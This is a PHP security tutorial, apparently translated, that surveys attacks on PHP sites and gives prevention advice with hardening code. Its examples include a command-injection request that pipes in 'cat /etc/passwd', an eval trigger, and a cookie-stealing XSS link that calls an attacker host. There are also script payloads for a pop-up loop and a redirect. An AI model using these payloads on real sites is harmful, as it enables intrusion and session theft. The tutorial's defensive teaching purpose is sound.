
Attack methods against PHP websites and examples of PHP vulnerabilities

2025-04-10 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

This article introduces the main attack methods used against PHP websites and walks through examples of PHP vulnerabilities. Many people run into these situations in real-world cases, so the editor will take you through how to deal with them. I hope you read it carefully and get something out of it!

The main attacks aimed at PHP websites are the following:

1. Command injection (Command Injection)

2. Eval injection (Eval Injection)

3. Client-side script insertion (Script Insertion)

4. Cross-site scripting (Cross Site Scripting, XSS)

5. SQL injection (SQL Injection)

6. Cross-site request forgery (Cross Site Request Forgery, CSRF)

7. Session hijacking (Session Hijacking)

8. Session fixation (Session Fixation)

9. HTTP response splitting (HTTP Response Splitting)

10. File upload vulnerability (File Upload Attack)

11. Directory traversal (Directory Traversal)

12. Remote file inclusion (Remote File Inclusion)

13. Dynamic function injection (Dynamic Variable Evaluation)

14. URL attack (URL Attack)

15. Spoofed form submissions (Spoofed Form Submissions)

16. Spoofed HTTP requests (Spoofed HTTP Requests)

Command injection attack

The following five facilities in PHP execute external programs:

system, exec, passthru, shell_exec, and the backtick operator `...` (equivalent to shell_exec)

Function prototypes:

string system(string $command, int &$return_var)

$command: the command to execute

$return_var: receives the exit status after the command has run

string exec(string $command, array &$output, int &$return_var)

$command: the command to execute

$output: receives each line of the command's output

$return_var: receives the exit status after the command has run

void passthru(string $command, int &$return_var)

$command: the command to execute

$return_var: receives the exit status after the command has run

string shell_exec(string $command)

$command: the command to execute

Examples of vulnerabilities

Example 1:

// ex1.php

We submit http://www.sectop.com/ex1.php?dir=| cat /etc/passwd

After submission, the executed command becomes system("ls -al | cat /etc/passwd")

Eval injection attack

The eval function executes the string passed to it as PHP code.

Function prototype:

mixed eval(string $code_str)

Eval injection usually occurs when an attacker can control the input string.

// ex2.php

Submitting http://www.sectop.com/ex2.php?arg=phpinfo(); triggers the vulnerability.

Dynamic function call

The programmer's intention was to call functions A and B dynamically; submitting http://www.sectop.com/ex.php?func=phpinfo triggers the vulnerability.
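As an added example (not the article's ex.php or ex2.php), here is the variable-function dispatch the article describes beside an allowlisted version, with the eval case handled by keeping the request value as data. It assumes ex.php calls whatever function name arrives in the func parameter and that ex2.php built code from the arg parameter; the function names a(), b() and the dispatch_*() helpers are ours.

```php
<?php
// Added example (not the article's ex.php or ex2.php): the variable-function
// dispatch the article describes, beside an allowlisted version.
// Assumption: ex.php calls whatever function name arrives in the "func"
// parameter, and ex2.php builds code from the "arg" parameter for eval().

function a(): string { return 'function A ran'; }
function b(): string { return 'function B ran'; }

// Vulnerable: any defined function can be named, e.g. func=phpinfo.
// Checking function_exists() or is_callable() does not help, because
// phpinfo, system and exec all pass that check.
function dispatch_vulnerable(string $func)
{
    return $func();
}

// Hardened: the request value is only a key into a fixed table of
// callables, so nothing outside the table can ever be invoked.
function dispatch_allowlisted(string $func): ?string
{
    $allowed = ['a' => 'a', 'b' => 'b'];
    if (!array_key_exists($func, $allowed)) {
        return null;   // unknown name: reject (log it, answer HTTP 400)
    }
    return $allowed[$func]();
}

// Eval injection: an assumed ex2.php pattern would be
//   eval('$var = ' . $_GET['arg'] . ';');
// so arg=phpinfo(); turns the request into executable code. The fix is to
// not build code from input at all: assign the value as data.
function assign_without_eval(array $get): string
{
    return isset($get['arg']) ? (string) $get['arg'] : '';
}

$get = ['func' => 'b', 'arg' => 'phpinfo();'];   // constructed request
echo dispatch_allowlisted($get['func']), "\n";   // table entry, runs b()
var_dump(dispatch_allowlisted('phpinfo'));        // not in the table: null
echo assign_without_eval($get), "\n";             // stays a plain string
```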

Prevention methods

1. Avoid executing external commands wherever possible

2. Replace external commands with custom functions or function libraries

3. Process command parameters with the escapeshellarg function

4. Use safe_mode_exec_dir to restrict the path from which executables may be run

The escapeshellarg function escapes any character that would end a parameter or command, replacing single quotation marks ' with \', double quotation marks " with \", and semicolons ; with \;

Use safe_mode_exec_dir to specify the directory for executables, and place the commands that will be needed into this directory in advance:

safe_mode = On

safe_mode_exec_dir = /usr/local/php/bin/
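As an added example (not the article's ex1.php), here is the concatenation the article implies for ex1.php beside two hardened forms; it assumes ex1.php appends the raw dir parameter to "ls -al", and the list_dir_*() helpers are ours. Note that escapeshellarg actually wraps the whole value in single quotes rather than backslash-escaping individual characters, and that safe_mode and safe_mode_exec_dir were removed in PHP 5.4, which makes the allowlist the portable choice.

```php
<?php
// Added example (not the article's ex1.php): the concatenation the article
// implies for ex1.php, beside two hardened forms. The functions only build
// the command string, so the example runs without executing anything.
// Assumption: ex1.php appends the raw "dir" parameter to "ls -al".

// Vulnerable: the shell parses the parameter, so dir=| cat /etc/passwd
// becomes a second command in a pipeline.
function list_dir_vulnerable(string $dir): string
{
    return 'ls -al ' . $dir;
}

// escapeshellarg() wraps the value in single quotes and escapes any quote
// inside it, so the shell hands the whole value to ls as one argument;
// the pipe character stays literal data.
function list_dir_escaped(string $dir): string
{
    return 'ls -al ' . escapeshellarg($dir);
}

// Stronger: only accept an existing directory below a fixed base path.
// realpath() resolves ../ and symlinks before the prefix comparison.
function list_dir_allowlisted(string $dir, string $base): ?string
{
    $baseReal = realpath($base);
    $real     = realpath($base . DIRECTORY_SEPARATOR . $dir);
    if ($baseReal === false || $real === false || !is_dir($real)) {
        return null;                       // not a directory under $base
    }
    if ($real !== $baseReal
        && strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // escaped the base directory
    }
    return 'ls -al ' . escapeshellarg($real);
}

$payload = '| cat /etc/passwd';            // the article's dir value
echo list_dir_vulnerable($payload), "\n";  // pipe reaches the shell
echo list_dir_escaped($payload), "\n";     // pipe is quoted as data
var_dump(list_dir_allowlisted($payload, sys_get_temp_dir()));   // rejected
var_dump(list_dir_allowlisted('.', sys_get_temp_dir()));        // accepted
```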

Client-side script insertion

Client-side script insertion (Script Insertion) means inserting executable script into objects such as forms, pictures, animations, or hyperlink text. When a user opens one of these objects, the script planted by the attacker runs and the attack begins.

HTML tags that can be used to insert script generally include the following:

1. The <script> tag: page script such as javascript or vbscript. The script code can be written inside the tag, or the URL of a script file can be given in the src attribute.

2. The <object> tag: java applets, multimedia files, ActiveX controls, and so on. The URL of the object is usually given in the data attribute.

3. The <embed> tag: multimedia files such as swf files. The URL of the object is usually given in the src attribute.

4. The <applet> tag: java applets. The URL of the object is usually given in the codebase attribute.

5. The <form> tag: the URL of the web application that processes the form data is given in the action attribute.

Attack steps for client-side script insertion

1. The attacker registers as an ordinary user and logs in to the website.

2. The attacker opens the message page and inserts the attacking js code.

3. Other users, including administrators, log in to the website and browse this message.

4. The js code hidden in the message is executed and the attack succeeds.

Example

Database:

CREATE TABLE `postmessage` (
  `id` int(11) NOT NULL auto_increment,
  `roomt` varchar(60) NOT NULL default '',
  `name` varchar(40) NOT NULL default '',
  `email` varchar(25) NOT NULL default '',
  `room` mediumtext NOT NULL,
  `postdate` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='user messages' AUTO_INCREMENT=69;

// add.php: inserts a message

// list.php: lists the messages

// show.php: displays a message

Submit the message shown in the picture below.

The js script is executed when this message is browsed.

Inserting while(1){window.open();} produces an endless loop of pop-up windows.

Inserting location.href="http://www.sectop.com"; redirects the visitor to a phishing page.

Or use other self-constructed js code to attack.

Prevention method

The htmlspecialchars function is generally used to convert special characters into HTML entities.

Function prototype:

string htmlspecialchars(string $string, int $quote_style, string $charset)

$string is the string to be encoded.

$quote_style is optional and may be ENT_COMPAT, ENT_QUOTES or ENT_NOQUOTES. The default is ENT_COMPAT, which converts only double quotation marks and leaves single quotation marks alone. ENT_QUOTES converts both double and single quotation marks. ENT_NOQUOTES converts neither.

$charset is optional and names the character set used.

The function converts the following special characters into HTML entities:

& --> &amp;

" --> &quot;

' --> &#039; (only with ENT_QUOTES)

< --> &lt;

> --> &gt;

Change line 98 of show.php to

Then recheck the page into which the js was inserted.

XSS cross-site scripting attack

XSS (Cross Site Scripting) means cross-site scripting attack; it is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets.

Cross-site scripting is mainly used by attackers to read the cookies or other personal data of website users. Once the attacker has this data, he can log in to the site disguised as that user and obtain that user's privileges.

General steps of a cross-site scripting attack:

1. The attacker sends the target user an http link containing the xss by some means.

2. The target user logs in to the website and, while logged in, opens the xss link sent by the attacker.

3. The website executes the xss attack script.

4. The target user's page jumps to the attacker's website, and the attacker obtains the target user's information.

5. The attacker logs in to the website using the target user's information and completes the attack.

When a program has a cross-site vulnerability, the attacker can construct a link such as http://www.sectop.com/search.php?key=_document.location='http://www.hack.com/getcookie.php?cookie='+[xss_clean]; and trick the user into clicking it to obtain the user's cookie value.

Precautions:

Use the htmlspecialchars function to convert special characters into HTML entities, exactly as described above under client-side script insertion.

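As an added example (not the article's show.php) serving both the script insertion section and this XSS section, here is a message renderer that passes the stored postmessage fields through htmlspecialchars on output, using the two payloads the article quotes as constructed input. The column names follow the article's table; the sample strings and the esc()/render_*() helpers are ours.

```php
<?php
// Added example (not the article's show.php): rendering stored message
// fields through htmlspecialchars() on output, using the two payloads the
// article quotes as constructed input. Column names follow the article's
// postmessage table; the strings and the esc()/render_*() helpers are ours.

// Constructed rows, as an attacker could have stored them through add.php.
$rows = [
    ['name' => 'alice', 'email' => 'a@example.com',
     'room' => 'plain text with <b>bold</b> and a & sign'],
    ['name' => "o'neil", 'email' => 'o@example.com',
     'room' => '<script>while(1){window.open();}</script>'],
    ['name' => 'x', 'email' => 'x@example.com',
     'room' => '<script>location.href="http://www.sectop.com";</script>'],
];

// Vulnerable rendering: database content is echoed straight into the page,
// so the browser runs whatever script the message contains.
function render_raw(array $row): string
{
    return "<p><b>{$row['name']}</b> ({$row['email']}): {$row['room']}</p>";
}

// ENT_QUOTES converts ' as well as ", which matters if a value ever lands
// inside a single-quoted attribute. The charset must match the page's
// output encoding (the article's table is gb2312; this example uses UTF-8).
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Hardened rendering: every field is encoded for an HTML text context,
// so the stored tags are displayed as text instead of being executed.
function render_safe(array $row): string
{
    return '<p><b>' . esc($row['name']) . '</b> ('
         . esc($row['email']) . '): ' . esc($row['room']) . '</p>';
}

foreach ($rows as $row) {
    echo render_raw($row), "\n";    // script tags reach the browser intact
    echo render_safe($row), "\n";   // script tags arrive as &lt;script&gt;
}

// The five conversions the article lists, produced by the function itself.
foreach (['&', '"', "'", '<', '>'] as $c) {
    echo $c, ' --> ', esc($c), "\n";
}
```

htmlspecialchars is only correct for HTML text and quoted attribute contexts; a value placed into JavaScript, a URL, or an unquoted attribute needs the encoding for that context instead.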

Cross-site scripting via the $_SERVER["PHP_SELF"] variable

In a form that submits its parameters back to itself, a statement like the following is used:
